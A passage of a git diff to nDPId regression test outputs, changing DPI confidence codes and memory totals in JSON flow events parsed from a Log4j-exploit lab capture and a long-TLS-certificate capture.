00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1639425834645,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834645,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNUUAAQAY\/J6wQ7goKCgof2MojKQYXlfcAAAAAoAJyEK5yAAACBAW0BAIICq5YS5wAAAAAAQMDBw=="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1639425834646,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1639425834646,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAACgAAEAAQAaMjAoKCh+sEO4KIynYygAAAAAGF5X4UBQAAGmJAAA="} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1639425834628,"flow_last_seen":1639425834647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00934{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1639425815407,"flow_last_seen":1639425834697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":869,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1639425834628,"flow_last_seen":1639425834647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00934{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1639425815407,"flow_last_seen":1639425834697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":869,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00647{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":354,"flow_first_seen":1639425815944,"flow_last_seen":1639425833586,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":861,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00934{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639425815910,"flow_last_seen":1639425815918,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} -00934{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639425834639,"flow_last_seen":1639425834642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1639425815682,"flow_last_seen":1639425833591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00934{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639425815910,"flow_last_seen":1639425815918,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +00934{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639425834639,"flow_last_seen":1639425834642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1639425815682,"flow_last_seen":1639425833591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","packets-captured":426,"packets-processed":422,"total-skipped-flows":0,"total-l4-payload-len":5830,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":54,"global_ts_msec":1639425834697} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 426/422 @@ -60,9 +60,9 @@ ~~ total active/idle flows...: 7/7 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5894613 bytes -~~ total memory freed........: 5894613 bytes -~~ total allocations/frees...: 118582/118582 +~~ total memory allocated....: 6028247 bytes +~~ total memory freed........: 6028247 bytes +~~ total allocations/frees...: 121344/121344 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 201 chars ~~ json string max len.......: 1057 chars diff --git a/test/results/long_tls_certificate.pcap.out b/test/results/long_tls_certificate.pcap.out index c88e2843c..650628960 100644 --- a/test/results/long_tls_certificate.pcap.out +++ b/test/results/long_tls_certificate.pcap.out @@ -4,10 +4,10 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1609756181300,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1609756181300,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGqknAqAE8ag9ke9glAbsIXeEZAAAAALAC\/\/9qjwAAAgQFtAEDAwUBAQgKDpRqEwAAAAAEAgAA"} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1609756181671,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1609756181671,"pkt":"KDc3AG3IEBMx8Tl2CABFAABAAABAACsGv0lqD2R7wKgBPAG72CWlbC1xCF3hGrASMqDiugAAAgQFrAEBAQEBAQEBAQEBAQEBAQEEAgAA"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1609756181671,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1609756181671,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGqmHAqAE8ag9ke9glAbsIXeEapWwtclAQ\/\/+JLgAA"} -00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609756181300,"flow_last_seen":1609756181681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1609756181681,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -05065{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7375,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","server_names":"*.aliyun.com,manager.channel.aliyun.com,*.ace.aliyun.com,*.acs-internal.aliyuncs.com,*.acs.aliyun.com,*.aicrowd.aliyun.com,*.alibabacloud.co.in,*.alibabacloud.com,*.alibabacloud.com.au,*.alibabacloud.com.hk,*.alibabacloud.com.my,*.alibabacloud.com.sg,*.alibabacloud.com.tw,*.alicdn.com,*.alicloud.com,*.aligroup.aliyun.com,*.alimei.com,*.alink.aliyun.com,*.alios.aliyuncs.com,*.aliplus.com,*.alitranx.aliyun.com,*.aliyun-iot-share.com,*.aliyuncs.com,*.alyms.cn,*.ap-northeast-1.aliyuncs.com,*.ap-south-1.aliyuncs.com,*.ap-southeast-1.aliyuncs.com,*.ap-southeast-2.aliyuncs.com,*.ap-southeast-3.aliyuncs.com,*.ap-southeast-5.aliyuncs.com,*.api.aliyun.com,*.apm.aliyun.com,*.app.aliyun.com,*.asmlink.cn,*.banma.aliyuncs.com,*.base.shuju.aliyun.com,*.bi.aliyun.com,*.biz.aliyun.com,*.bridge.aliyun.com,*.ccc.aliyuncs.com,*.center.aliyun.com,*.citybrain.aliyun.com,*.cloudapp.aliyun.com,*.cloudeagle.cn,*.cloudgame.aliyun.com,*.cn-beijing.aliyuncs.com,*.cn-chengdu.aliyuncs.com,*.cn-guizhou.aliyuncs.com,*.cn-haidian.aliyuncs.com,*.cn-hangzhou-finance.aliyuncs.com,*.cn-hangzhou.aliyuncs.com,*.cn-hongkong.aliyuncs.com,*.cn-huhehaote.aliyuncs.com,*.cn-ningxia.aliyuncs.com,*.cn-north-2-gov-1.aliyuncs.com,*.cn-qingdao-nebula.aliyuncs.com,*.cn-qingdao.aliyuncs.com,*.cn-shanghai-finance-1.aliyuncs.com,*.cn-shanghai.aliyun.com,*.cn-shanghai.aliyuncs.com,*.cn-shenzhen-cloudstone.aliyuncs.com,*.cn-shenzhen-finance-1.aliyuncs.com,*.cn-shenzhen.aliyuncs.com,*.cn-sichuan.aliyuncs.com,*.cn-zhangjiakou.aliyuncs.com,*.connect.aliyun.com,*.console.alibabacloud.com,*.console.alicloud.com,*.console.aliyun.com,*.cs.aliyun.com,*.cschat-ccs.aliyun.com,*.data.aliyun.com,*.dataapi.aliyun.com,*.dataq.aliyuncs.com,*.datav.aliyun.com,*.datav.aliyuncs.com,*.devlops.aliyun.com,*.devops.aliyun.com,*.ditu.aliyun.com,*.domain.aliyun.com,*.dyiot.aliyun.com,*.ebs.aliyun.com,*.emas.aliyun.com,*.emr.aliyun.com,*.enterprise.aliyun.com,*.env.aliyun.com,*.et-industry.aliyun.com,*.eu-central-1.aliyuncs.com,*.eu-west-1.aliyuncs.com,*.fc.aliyun.com,*.feedback.console.aliyun.com,*.gts-x.aliyun.com,*.gts.aliyun.com,*.help-ccs.aliyun.com,*.ialicdn.com,*.in-mumbai.aliyuncs.com,*.iot.aliyun.com,*.jp-fudao.aliyuncs.com,*.linkedmall.aliyun.com,*.linkwan.aliyun.com,*.living.aliyun.com,*.luban.aliyun.com,*.m.aliyun.com,*.market.aliyun.com,*.maxcompute.aliyun.com,*.me-east-1.aliyuncs.com,*.media.aliyun.com,*.microdingtalk.aliyun.com,*.mit.aliyun.com,*.mobile.aliyun.com,*.msea.aliyun.com,*.mts.aliyun.com,*.mvp.aliyun.com,*.nebula.aliyun.com,*.nls.aliyuncs.com,*.odps.aliyun.com,*.ons.aliyun.com,*.ose.aliyun.com,*.pai.data.aliyun.com,*.pcs-gw-cn-beijing.aliyun.com,*.pcs-gw-cn-shanghai.aliyun.com,*.phpwind.com,*.phpwind.net,*.pre-sg-purchase.aliyun.com,*.prepub.aliyun.com,*.product.center.aliyun.com,*.pts.aliyun.com,*.r-app-cn-beijing-data.aliyun.com,*.r-app-cn-hangzhou-data.aliyun.com,*.r-app-cn-shenzhen-data.aliyun.com,*.r-app-data.aliyun.com,*.rdc.aliyun.com,*.rds.aliyun.com,*.reid.aliyun.com,*.sc-cmdb.aliyuncs.com,*.scsp.aliyun.com,*.sg.aliyuncs.com,*.shuju.aliyun.com,*.smart.aliyun.com,*.soc.aliyun.com,*.soc.aliyuncs.com,*.sparenode.com,*.supet.com,*.tburl.in,*.teambition.com,*.teambition.net,*.teambitionapis.com,*.tianchi.aliyun.com,*.toolkit.aliyun.com,*.tv.aliyun.com,*.tw-gaoxiong.aliyuncs.com,*.us-east-1.aliyuncs.com,*.us-west-1.aliyuncs.com,*.webide.aliyun.com,*.yuntu.aliyun.com,account.www.net.cn,alibabacloud.co.in,alibabacloud.com,alibabacloud.com.au,alibabacloud.com.hk,alibabacloud.com.my,alibabacloud.com.sg,alibabacloud.com.tw,alicdn.com,alicloud.com,alimei.com,aliyun-iot-share.com,aliyuncs.com,dc.www.net.cn,dmp.www.net.cn,dns.www.net.cn,panda.www.net.cn,pandavip.www.net.cn,phpwind.com,phpwind.net,scdnphi6.com,sparenode.com,supet.com,tburl.in,teambition.com,teambition.net,teambitionapis.com,tianchi-global.com,whois.www.net.cn,aliyun.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2","subjectDN":"C=CN, ST=ZheJiang, L=HangZhou, O=Alibaba (China) Technology Co., Ltd., CN=*.aliyun.com","alpn":"h2,http\/1.1","fingerprint":"2B:C6:82:22:E9:94:09:24:34:E1:5C:F1:24:76:98:75:45:78:53:DA"}} -00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":47,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1609756181300,"flow_last_seen":1609756183162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12100,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1609756183162,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"}} +00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609756181300,"flow_last_seen":1609756181681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1609756181681,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +05065{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7375,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","server_names":"*.aliyun.com,manager.channel.aliyun.com,*.ace.aliyun.com,*.acs-internal.aliyuncs.com,*.acs.aliyun.com,*.aicrowd.aliyun.com,*.alibabacloud.co.in,*.alibabacloud.com,*.alibabacloud.com.au,*.alibabacloud.com.hk,*.alibabacloud.com.my,*.alibabacloud.com.sg,*.alibabacloud.com.tw,*.alicdn.com,*.alicloud.com,*.aligroup.aliyun.com,*.alimei.com,*.alink.aliyun.com,*.alios.aliyuncs.com,*.aliplus.com,*.alitranx.aliyun.com,*.aliyun-iot-share.com,*.aliyuncs.com,*.alyms.cn,*.ap-northeast-1.aliyuncs.com,*.ap-south-1.aliyuncs.com,*.ap-southeast-1.aliyuncs.com,*.ap-southeast-2.aliyuncs.com,*.ap-southeast-3.aliyuncs.com,*.ap-southeast-5.aliyuncs.com,*.api.aliyun.com,*.apm.aliyun.com,*.app.aliyun.com,*.asmlink.cn,*.banma.aliyuncs.com,*.base.shuju.aliyun.com,*.bi.aliyun.com,*.biz.aliyun.com,*.bridge.aliyun.com,*.ccc.aliyuncs.com,*.center.aliyun.com,*.citybrain.aliyun.com,*.cloudapp.aliyun.com,*.cloudeagle.cn,*.cloudgame.aliyun.com,*.cn-beijing.aliyuncs.com,*.cn-chengdu.aliyuncs.com,*.cn-guizhou.aliyuncs.com,*.cn-haidian.aliyuncs.com,*.cn-hangzhou-finance.aliyuncs.com,*.cn-hangzhou.aliyuncs.com,*.cn-hongkong.aliyuncs.com,*.cn-huhehaote.aliyuncs.com,*.cn-ningxia.aliyuncs.com,*.cn-north-2-gov-1.aliyuncs.com,*.cn-qingdao-nebula.aliyuncs.com,*.cn-qingdao.aliyuncs.com,*.cn-shanghai-finance-1.aliyuncs.com,*.cn-shanghai.aliyun.com,*.cn-shanghai.aliyuncs.com,*.cn-shenzhen-cloudstone.aliyuncs.com,*.cn-shenzhen-finance-1.aliyuncs.com,*.cn-shenzhen.aliyuncs.com,*.cn-sichuan.aliyuncs.com,*.cn-zhangjiakou.aliyuncs.com,*.connect.aliyun.com,*.console.alibabacloud.com,*.console.alicloud.com,*.console.aliyun.com,*.cs.aliyun.com,*.cschat-ccs.aliyun.com,*.data.aliyun.com,*.dataapi.aliyun.com,*